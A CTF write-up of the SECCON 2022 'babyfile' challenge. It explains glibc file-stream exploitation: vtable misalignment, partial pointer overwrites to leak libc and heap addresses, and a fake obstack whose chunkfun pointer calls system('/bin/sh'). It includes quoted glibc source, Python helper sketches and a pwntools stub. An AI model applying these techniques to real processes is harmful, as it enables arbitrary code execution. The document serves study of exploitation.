babyfile is a file stream exploitation challenge I worked on during the SECCON CTF 2022 Quals event. I didn't manage to flag it within the 24 hours :(. Anyway, I hope this write-up will be interesting to read, given that I show another way to gain code execution (one I had not seen before) based on _IO_obstack_jumps! The related files can be found here. If you're not familiar with file stream internals, I advise you to read my previous write-ups about file stream exploitation, especially this one and this other one.
TL;DR
Populate the base buffer with heap addresses with the help of _IO_file_doallocate.
Make both the input and output buffers equal to the base buffer with the help of _IO_file_underflow.
Partially overwrite the right pointers to get a libc leak by simply flushing the file stream.
Leak a heap address by printing a pointer stored within the main_arena.
_IO_obstack_overflow ends up calling a function pointer stored within the file stream, which we control. This gives a call primitive (with control over the first argument). Then I just called system("/bin/sh\x00").
What we have
The challenge basically opens /dev/null, asks for an offset and a value to write at fp + offset, and lets us freely flush fp. The source code is provided:
Get a libc leak by calling _IO_file_underflow to make the input and output buffers equal to the base buffer, which contains a heap address thanks to _IO_file_doallocate, and then flush the file stream to leak the libc.
Get a heap leak by leaking a heap pointer stored within the main_arena.
Get an arbitrary write with a tcache dup technique. I got __free_hook as the last pointer available in the target tcache bin, but I didn't succeed in getting a shell >.<.
Get a call primitive with control over the first argument by calling _IO_obstack_overflow (part of the _IO_obstack_jumps vtable), which allows us to call system("/bin/sh\x00").
Libc leak
To get a libc leak, we have to write to stdout a certain number of bytes that contain a libc address. To do so, we look for a way to make interesting pointers appear in the base buffer, then initialize both the input and output buffers to the base buffer, and finally do a partial overwrite on these fields so that they point to an area that contains libc pointers. To get heap addresses within the base buffer, we can misalign the vtable in such a way that fp->vtable->sync() calls _IO_default_doallocate. Then _IO_default_doallocate is called and does some operations:
The initial state of the file stream looks like this:
Once we have a valid pointer in the base buffer, we try to copy the base pointer into both the input and output buffers. Given that the input and output buffers are NULL and that fp->flags is 0xfbad1800 | 0x8000 (0x8000 being _IO_USER_LOCK, so that we do not get stuck in fflush), we do not have issues with the checks. The issue with the _IO_SYSREAD call is described in the code below.
  if (fp->_IO_buf_base == NULL)
    {
      /* Maybe we already have a push back pointer.  */
      if (fp->_IO_save_base != NULL)
        {
          free (fp->_IO_save_base);
          fp->_flags &= ~_IO_IN_BACKUP;
        }
      _IO_doallocbuf (fp);
    }

  /* FIXME This can/should be moved to genops ?? */
  if (fp->_flags & (_IO_LINE_BUF|_IO_UNBUFFERED))
    {
      /* We used to flush all line-buffered stream.  This really isn't
         required by any standard.  My recollection is that
         traditional Unix systems did this for stdout.  stderr better
         not be line buffered.  So we do just that here
         explicitly.  --drepper */
      _IO_acquire_lock (stdout);

  /* This is very tricky. We have to adjust those
     pointers before we call _IO_SYSREAD () since
     we may longjump () out while waiting for
     input. Those pointers may be screwed up. H.J. */
  fp->_IO_read_base = fp->_IO_read_ptr = fp->_IO_buf_base;
  fp->_IO_read_end = fp->_IO_buf_base;
  fp->_IO_write_base = fp->_IO_write_ptr = fp->_IO_write_end
    = fp->_IO_buf_base;

  /* Given the vtable is misaligned, _IO_SYSREAD will call
     _IO_default_pbackfail, the code is given after
     _IO_new_file_underflow */
  count = _IO_SYSREAD (fp, fp->_IO_buf_base,
                       fp->_IO_buf_end - fp->_IO_buf_base);

  if (count <= 0)
    {
      if (count == 0)
        fp->_flags |= _IO_EOF_SEEN;
      else
        fp->_flags |= _IO_ERR_SEEN, count = 0;
    }
  fp->_IO_read_end += count;
  if (count == 0)
    {
      /* If a stream is read to EOF, the calling application may switch active
         handles.  As a result, our offset cache would no longer be valid, so
         unset it.  */
      fp->_offset = _IO_pos_BAD;
      return EOF;
    }
  if (fp->_offset != _IO_pos_BAD)
    _IO_pos_adjust (fp->_offset, count);
  return *(unsigned char *) fp->_IO_read_ptr;
}
libc_hidden_ver (_IO_new_file_underflow, _IO_file_underflow)
int
_IO_default_pbackfail (FILE *fp, int c)
{
  if (fp->_IO_read_ptr > fp->_IO_read_base && !_IO_in_backup (fp)
      && (unsigned char) fp->_IO_read_ptr[-1] == c)
    --fp->_IO_read_ptr;
  else
    {
      /* Need to handle a filebuf in write mode (switch to read mode). FIXME!*/
      if (!_IO_in_backup (fp))
        {
          /* We need to keep the invariant that the main get area
             logically follows the backup area.  */
          if (fp->_IO_read_ptr > fp->_IO_read_base && _IO_have_backup (fp))
            {
              if (save_for_backup (fp, fp->_IO_read_ptr))
                return EOF;
            }
          else if (!_IO_have_backup (fp))
            {
              // !! We should take this path cuz there is no save buffer plus we do not have the backup flag
              /* No backup buffer: allocate one. */
              /* Use nshort buffer, if unused? (probably not)  FIXME */
              int backup_size = 128;
              char *bbuf = (char *) malloc (backup_size);
              if (bbuf == NULL)
                return EOF;
              fp->_IO_save_base = bbuf;
              fp->_IO_save_end = fp->_IO_save_base + backup_size;
              fp->_IO_backup_base = fp->_IO_save_end;
            }
          fp->_IO_read_base = fp->_IO_read_ptr;
          _IO_switch_to_backup_area (fp);
        }
      else if (fp->_IO_read_ptr <= fp->_IO_read_base)
        {
          /* Increase size of existing backup buffer. */
          size_t new_size;
          size_t old_size = fp->_IO_read_end - fp->_IO_read_base;
          char *new_buf;
          new_size = 2 * old_size;
          new_buf = (char *) malloc (new_size);
          if (new_buf == NULL)
            return EOF;
          memcpy (new_buf + (new_size - old_size), fp->_IO_read_base,
                  old_size);
          free (fp->_IO_read_base);
          _IO_setg (fp, new_buf, new_buf + (new_size - old_size),
                    new_buf + new_size);
          fp->_IO_backup_base = fp->_IO_read_ptr;
        }
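The vtable misalignment used so far is just pointer arithmetic on the slots of the jump table. Here is a minimal sketch of it, assuming the usual x86-64 layout of struct _IO_jump_t (two dummy entries followed by 8-byte function pointers). The helper names and the table address are hypothetical and only serve the illustration. It shows that shifting the vtable so that the sync slot lands on underflow also makes the read slot land on pbackfail, which matches the comment above the _IO_SYSREAD call.

```python
# Slot order inside struct _IO_jump_t (assumed x86-64 layout, 8 bytes per slot).
SLOTS = [
    "dummy", "dummy2", "finish", "overflow", "underflow", "uflow",
    "pbackfail", "xsputn", "xsgetn", "seekoff", "seekpos", "setbuf",
    "sync", "doallocate", "read", "write", "seek", "close", "stat",
    "showmanyc", "imbue",
]
OFFSET = {name: 8 * i for i, name in enumerate(SLOTS)}


def misaligned_vtable(table_addr, called_slot, wanted_slot):
    """Value to write in fp->vtable so that called_slot dispatches to wanted_slot."""
    return table_addr + OFFSET[wanted_slot] - OFFSET[called_slot]


def resolves_to(table_addr, fake_vtable, called_slot):
    """Name of the real table entry that called_slot ends up using."""
    delta = fake_vtable + OFFSET[called_slot] - table_addr
    return SLOTS[delta // 8]


# Hypothetical address of a jump table inside libc, for illustration only.
TABLE = 0x7ffff7e164a0

fake = misaligned_vtable(TABLE, "sync", "underflow")
print(hex(fake - TABLE))                  # shift applied to the vtable pointer
print(resolves_to(TABLE, fake, "read"))   # entry reached by _IO_SYSREAD
```

The same helper gives the shift for any other pair of slots, for example sync to doallocate or sync to overflow. Since the pointer still falls inside the vtable section, it is expected to pass the vtable validation, but that depends on the libc version.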
Once the pointers are in the right place, we can simply do some partial overwrites so that they point to the portion of the heap that contains a libc pointer. Indeed, by taking a look at the memory at fp->_IO_buf_base & ~0xff (clearing only the low byte avoids a 4-bit brute force), we can see that we can directly reach a libc pointer.
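To make the brute-force remark concrete, here is a small sketch of the arithmetic, assuming 4 KiB pages (so the low 12 bits of a heap address are not randomized). The function names and the pointer value are hypothetical. Overwriting one byte only touches known bits, while overwriting two bytes would clobber 4 randomized bits.

```python
def partial_overwrite(ptr, new_low, nbytes=1):
    """Return ptr with its nbytes least significant bytes replaced by new_low."""
    mask = (1 << (8 * nbytes)) - 1
    return (ptr & ~mask) | (new_low & mask)


def unknown_bits(nbytes, page_bits=12):
    """Number of ASLR-randomized bits clobbered by an nbytes partial overwrite."""
    return max(0, 8 * nbytes - page_bits)


# Hypothetical heap pointer sitting in fp->_IO_buf_base.
buf_base = 0x55555555b480

print(hex(partial_overwrite(buf_base, 0x00)))  # same as buf_base & ~0xff
print(unknown_bits(1), unknown_bits(2))        # bits to guess for 1 and 2 bytes
```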
int
_IO_new_file_sync (FILE *fp)
{
  ssize_t delta;
  int retval = 0;

  /*    char* ptr = cur_ptr(); */
  if (fp->_IO_write_ptr > fp->_IO_write_base)
    if (_IO_do_flush(fp))
      return EOF;
  delta = fp->_IO_read_ptr - fp->_IO_read_end;
  if (delta != 0)
    {
      off64_t new_pos = _IO_SYSSEEK (fp, delta, 1);
      if (new_pos != (off64_t) EOF)
        fp->_IO_read_end = fp->_IO_read_ptr;
      else if (errno == ESPIPE)
        ; /* Ignore error from unseekable devices. */
      else
        retval = EOF;
    }
  if (retval != EOF)
    fp->_offset = _IO_pos_BAD;
  /* FIXME: Cleanup - can this be shared? */
  /*    setg(base(), ptr, ptr); */
  return retval;
}
libc_hidden_ver (_IO_new_file_sync, _IO_file_sync)
I already talked about how to gain an arbitrary read with an FSOP attack on stdout in this article. The way we get a leak here is almost the same: first we need to satisfy the first condition in _IO_new_file_sync, so that fp->_IO_write_ptr > fp->_IO_write_base triggers _IO_do_flush(fp). Then _IO_do_flush goes through the classic code path I dump right below. I will not comment on all of it; the only thing to remember is that, since most of the buffers are already initialized to a valid heap address beyond the target, we do not have to rewrite them, which significantly reduces the number of partial overwrites.
static size_t
new_do_write (FILE *fp, const char *data, size_t to_do)
{
  size_t count;
  if (fp->_flags & _IO_IS_APPENDING)
    /* On a system without a proper O_APPEND implementation,
       you would need to sys_seek(0, SEEK_END) here, but is
       not needed nor desirable for Unix- or Posix-like systems.
       Instead, just indicate that offset (before and after) is
       unpredictable. */
    fp->_offset = _IO_pos_BAD;
  else if (fp->_IO_read_end != fp->_IO_write_base)
    {
      off64_t new_pos
        = _IO_SYSSEEK (fp, fp->_IO_write_base - fp->_IO_read_end, 1);
      if (new_pos == _IO_pos_BAD)
        return 0;
      fp->_offset = new_pos;
    }
  count = _IO_SYSWRITE (fp, data, to_do);
  if (fp->_cur_column && count)
    fp->_cur_column = _IO_adjust_column (fp->_cur_column - 1, data, count) + 1;
  _IO_setg (fp, fp->_IO_buf_base, fp->_IO_buf_base, fp->_IO_buf_base);
  fp->_IO_write_base = fp->_IO_write_ptr = fp->_IO_buf_base;
  fp->_IO_write_end = (fp->_mode <= 0
                       && (fp->_flags & (_IO_LINE_BUF | _IO_UNBUFFERED))
                       ? fp->_IO_buf_base : fp->_IO_buf_end);
  return count;
}
Note: fp->_IO_read_end != fp->_IO_write_base here, because fp->_IO_read_end points into the save buffer that was allocated and switched to in _IO_default_pbackfail, while _IO_write_base points to the target memory area. We therefore have to include the _IO_IS_APPENDING flag in fp->_flags to avoid the _IO_SYSSEEK, which would fail and make the function return. With that, we finally reach the _IO_SYSWRITE that leaks the libc pointer.
To use the _IO_obstack_jumps technique, we have to craft a custom obstack structure on the heap (right on our file stream, in fact), and thus we need to leak the heap to be able to reference it. Given that we already have a libc leak, that's very easy: some heap pointers are stored within the main_arena, which means we just have to use the same _IO_fflush trick to flush the file stream and leak a heap pointer stored in the main_arena. I wrote a function that directly leaks the right pointer from a given address:
As far as I know, obstack has never been used in a CTF, even though it can be leveraged as a very good call primitive (and, as said before, it needs a heap leak and a libc leak to be used). Basically, the _IO_obstack_jumps vtable looks like this:
Given that the second argument is 0x1 when _IO_SYNC is called in _IO_fflush, we cannot call functions like _IO_obstack_xsputn that need a buffer as argument; that's the reason why we have to dig into _IO_obstack_overflow.
static int
_IO_obstack_overflow (FILE *fp, int c)
{
  struct obstack *obstack = ((struct _IO_obstack_file *) fp)->obstack;
  int size;

  /* Make room for another character.  This might as well allocate a
     new chunk a memory and moves the old contents over.  */
  assert (c != EOF);
  obstack_1grow (obstack, c);

  /* Setup the buffer pointers again.  */
  fp->_IO_write_base = obstack_base (obstack);
  fp->_IO_write_ptr = obstack_next_free (obstack);
  size = obstack_room (obstack);
  fp->_IO_write_end = fp->_IO_write_ptr + size;
  /* Now allocate the rest of the current chunk.  */
  obstack_blank_fast (obstack, size);

  return c;
}
The struct _IO_obstack_file is defined as follows:
struct obstack          /* control current object in current chunk */
{
  long chunk_size;              /* preferred size to allocate chunks in */
  struct _obstack_chunk *chunk; /* address of current struct obstack_chunk */
  char *object_base;            /* address of object we are building */
  char *next_free;              /* where to add next char to current object */
  char *chunk_limit;            /* address of char after current chunk */
  union
  {
    PTR_INT_TYPE tempint;
    void *tempptr;
  } temp;                       /* Temporary for some macros.  */
  int alignment_mask;           /* Mask of alignment for each object. */
  /* These prototypes vary based on 'use_extra_arg', and we use
     casts to the prototypeless function type in all assignments,
     but having prototypes here quiets -Wstrict-prototypes.  */
  struct _obstack_chunk *(*chunkfun) (void *, long);
  void (*freefun) (void *, struct _obstack_chunk *);
  void *extra_arg;              /* first arg for chunk alloc/dealloc funcs */
  unsigned use_extra_arg : 1;     /* chunk alloc/dealloc funcs take extra arg */
  unsigned maybe_empty_object : 1; /* There is a possibility that the current
                                      chunk contains a zero-length object.  This
                                      prevents freeing the chunk if we allocate
                                      a bigger chunk to replace it. */
  unsigned alloc_failed : 1;      /* No longer used, as we now call the failed
                                     handler on error, but retained for binary
                                     compatibility.  */
};
Once obstack_1grow is called, if __o->next_free + 1 > __o->chunk_limit, _obstack_newchunk gets called.
/* Allocate a new current chunk for the obstack *H
   on the assumption that LENGTH bytes need to be added
   to the current object, or a new object of length LENGTH allocated.
   Copies any partial object from the end of the old chunk
   to the beginning of the new one.  */

void
_obstack_newchunk (struct obstack *h, int length)
{
  struct _obstack_chunk *old_chunk = h->chunk;
  struct _obstack_chunk *new_chunk;
  long new_size;
  long obj_size = h->next_free - h->object_base;
  long i;
  long already;
  char *object_base;

  /* Compute size for new chunk.  */
  new_size = (obj_size + length) + (obj_size >> 3) + h->alignment_mask + 100;
  if (new_size < h->chunk_size)
    new_size = h->chunk_size;

  /* Allocate and initialize the new chunk.  */
  new_chunk = CALL_CHUNKFUN (h, new_size);
  if (!new_chunk)
    (*obstack_alloc_failed_handler)();
  h->chunk = new_chunk;
  new_chunk->prev = old_chunk;
  new_chunk->limit = h->chunk_limit = (char *) new_chunk + new_size;

  /* Compute an aligned object_base in the new chunk */
  object_base =
    __PTR_ALIGN ((char *) new_chunk, new_chunk->contents, h->alignment_mask);

  /* Move the existing object to the new chunk.
     Word at a time is fast and is safe if the object
     is sufficiently aligned.  */
  if (h->alignment_mask + 1 >= DEFAULT_ALIGNMENT)
    {
      for (i = obj_size / sizeof (COPYING_UNIT) - 1;
           i >= 0; i--)
        ((COPYING_UNIT *) object_base)[i]
          = ((COPYING_UNIT *) h->object_base)[i];
      /* We used to copy the odd few remaining bytes as one extra COPYING_UNIT,
         but that can cross a page boundary on a machine
         which does not do strict alignment for COPYING_UNITS.  */
      already = obj_size / sizeof (COPYING_UNIT) * sizeof (COPYING_UNIT);
    }
  else
    already = 0;
  /* Copy remaining bytes one by one.  */
  for (i = already; i < obj_size; i++)
    object_base[i] = h->object_base[i];

  /* If the object just copied was the only data in OLD_CHUNK,
     free that chunk and remove it from the chain.
     But not if that chunk might contain an empty object.  */
  if (!h->maybe_empty_object
      && (h->object_base
          == __PTR_ALIGN ((char *) old_chunk, old_chunk->contents,
                          h->alignment_mask)))
    {
      new_chunk->prev = old_chunk->prev;
      CALL_FREEFUN (h, old_chunk);
    }

  h->object_base = object_base;
  h->next_free = h->object_base + obj_size;
  /* The new chunk certainly contains no empty object yet.  */
  h->maybe_empty_object = 0;
}
# ifdef _LIBC
libc_hidden_def (_obstack_newchunk)
# endif
The interesting part of the function is the call to the CALL_CHUNKFUN macro that calls a raw unencrypted function pointer referenced by the obstack structure with either a controlled argument ((h)->extra_arg) or only with the size.
# define CALL_FREEFUN(h, old_chunk) \
  do { \
    if ((h)->use_extra_arg) \
      (*(h)->freefun)((h)->extra_arg, (old_chunk)); \
    else \
      (*(void (*)(void *))(h)->freefun)((old_chunk)); \
  } while (0)
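To visualize the constraints on the fake obstack, here is a rough sketch that packs a struct obstack with Python's struct module. It assumes the x86-64 layout of the structure shown earlier (8-byte pointers, alignment_mask padded to 8 bytes, use_extra_arg being the lowest bit of the bit-field word). The function name and the two addresses are hypothetical, and this is not the exact payload of my exploit, only an illustration of which fields matter.

```python
import struct


def fake_obstack(chunkfun, extra_arg):
    """Pack a struct obstack whose next 1-byte grow calls chunkfun(extra_arg, size)."""
    return struct.pack(
        "<qQQQQQi4xQQQI4x",
        0,          # 0x00 chunk_size
        0,          # 0x08 chunk
        0,          # 0x10 object_base
        0,          # 0x18 next_free
        0,          # 0x20 chunk_limit: next_free + 1 > chunk_limit, so a new chunk is requested
        0,          # 0x28 temp
        0,          # 0x30 alignment_mask (int, followed by 4 bytes of padding)
        chunkfun,   # 0x38 chunkfun: raw function pointer that gets called
        0,          # 0x40 freefun
        extra_arg,  # 0x48 extra_arg: first argument of the call
        1,          # 0x50 bit-fields: use_extra_arg = 1
    )


# Hypothetical leaked addresses, for illustration only.
SYSTEM = 0x7ffff7c50d60
BINSH = 0x7ffff7dd8698

blob = fake_obstack(SYSTEM, BINSH)
print(hex(len(blob)))
```

The file stream then needs its obstack pointer (the field that follows the FILE and its vtable pointer in struct _IO_obstack_file) to reference this blob, and its vtable to be shifted so that the sync slot reaches _IO_obstack_overflow.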
If I summarize, to call system("/bin/sh") we need to have:
def remote(argv=[], *a, **kw):
    '''Connect to the process on the remote host'''
    io = pwn.connect(host, port)
    if pwn.args.GDB:
        pwn.gdb.attach(io, gdbscript=gdbscript)
    return io

def start(argv=[], *a, **kw):
    '''Start the exploit against the target.'''
    if pwn.args.LOCAL:
        return local(argv, *a, **kw)
    else:
        return remote(argv, *a, **kw)